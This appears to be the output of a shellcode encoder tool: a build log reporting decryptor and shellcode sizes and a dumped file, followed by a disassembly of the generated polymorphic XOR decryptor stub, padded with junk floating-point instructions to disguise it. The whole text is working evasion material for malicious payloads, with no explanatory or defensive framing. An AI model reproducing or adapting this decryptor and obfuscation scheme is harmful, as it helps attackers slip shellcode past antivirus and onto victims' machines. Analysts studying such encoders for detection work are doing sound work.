
[+] Decryptor body size = 171 bytes
[+] Shellcode size = 349 bytes
[+] Decryptor + Shellcode size = 520 bytes
[+] Magic byte is CD
[+] Crypto steping = 2 byte(s)
[+] Pass steping = 2 byte(s)
[+] Shellcode dumped to D:\asm\shell.txt.tapion_bin
[+] Written 525 bytes
[+] Shellcode header stored to D:\asm\shell.txt.tapion_bin.h


00401093   68 9058FFE0      PUSH E0FF5890
00401098   8BC4             MOV EAX,ESP
0040109A   FFD0             CALL EAX
0040109C   C7C3 500490E1    MOV EBX,E1900450
004010A2   0FCB             BSWAP EBX
004010A4   81EB 848F0450    SUB EBX,50048F84
004010AA   C7C1 CD56396E    MOV ECX,6E3956CD
004010B0   D9FD             FSCALE
004010B2   DDD9             FSTP ST(1)
004010B4   81FB 0814B942    CMP EBX,42B91408
004010BA   81E9 CE56396E    SUB ECX,6E3956CE
004010C0   D9FB             FSINCOS
004010C2   D9FF             FCOS
004010C4   41               INC ECX
004010C5   03C8             ADD ECX,EAX
004010C7   D9F3             FPATAN
004010C9   21D2             AND EDX,EDX
004010CB   F9               STC
004010CC   D9EB             FLDPI
004010CE   21D2             AND EDX,EDX
004010D0   68 E289081B      PUSH 1B0889E2
004010D5   5E               POP ESI
004010D6   81EE E287081B    SUB ESI,1B0887E2
004010DC   8B11             MOV EDX,DWORD PTR DS:[ECX]
004010DE   8039 CD          CMP BYTE PTR DS:[ECX],0CD
004010E1   9B               WAIT
004010E2   DBE3             FINIT
004010E4   D8D9             FCOMP ST(1)
004010E6   75 23            JNZ SHORT testsh.0040110B
004010E8   D9F2             FPTAN
004010EA   C7C1 E8E79137    MOV ECX,3791E7E8
004010F0   DDD1             FST ST(1)
004010F2   D9F0             F2XM1
004010F4   DAE9             FUCOMPP
004010F6   81E9 EBE79137    SUB ECX,3791E7EB
004010FC   41               INC ECX
004010FD   DEF1             FDIVRP ST(1),ST
004010FF   DBE2             FCLEX
00401101   41               INC ECX
00401102   D9F2             FPTAN
00401104   41               INC ECX
00401105   03C8             ADD ECX,EAX
00401107   D9F7             FINCSTP
00401109   D9F7             FINCSTP
0040110B   4E               DEC ESI
0040110C   90               NOP
0040110D   F5               CMC
0040110E   F9               STC
0040110F   90               NOP
00401110   4E               DEC ESI
00401111   D9ED             FLDLN2
00401113   D9EA             FLDL2E
00401115   311406           XOR DWORD PTR DS:[ESI+EAX],EDX
00401118   D9F7             FINCSTP
0040111A   DED9             FCOMPP
0040111C   4B               DEC EBX
0040111D   D9E9             FLDL2T
0040111F   8BDB             MOV EBX,EBX
00401121   DDC1             FFREE ST(1)
00401123   D9F8             FPREM
00401125   4B               DEC EBX
00401126   85C9             TEST ECX,ECX
00401128   41               INC ECX
00401129   FC               CLD
0040112A   D9F1             FYL2X
0040112C   D9FD             FSCALE
0040112E   09DB             OR EBX,EBX
00401130   D9D0             FNOP
00401132   41               INC ECX
00401133   F9               STC
00401134   DEE9             FSUBP ST(1),ST
00401136   FD               STD
00401137   3BC9             CMP ECX,ECX
00401139   F9               STC
0040113A   21DB             AND EBX,EBX
0040113C  ^7F 9E            JG SHORT testsh.004010DC

